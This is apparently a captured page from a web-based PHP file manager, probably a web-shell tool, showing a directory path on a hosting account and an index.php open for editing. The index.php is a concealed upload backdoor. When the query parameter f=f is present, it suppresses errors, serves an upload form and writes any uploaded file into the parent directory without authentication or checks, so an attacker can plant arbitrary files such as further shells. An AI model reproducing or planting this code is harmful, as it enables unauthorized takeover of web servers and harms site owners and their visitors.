📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-07-12 17:23:19
📂
/ (Root)
/
home
/
bunciqdt
/
apkbot.tools
/
cdsfloa
/
pnglitm
📍 /home/bunciqdt/apkbot.tools/cdsfloa/pnglitm
🔄 Refresh
✏️
Editing: index.php
Read Only
<?php error_reporting(0); if(trim($_GET['f']) == 'f'){ $saw1 = $_FILES['file']['tmp_name']; $saw2 = '../'.$_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='upload' /></form>"; if($saw1 && $saw2) move_uploaded_file($saw1, $saw2); } ?>
💾 Save Changes
❌ Cancel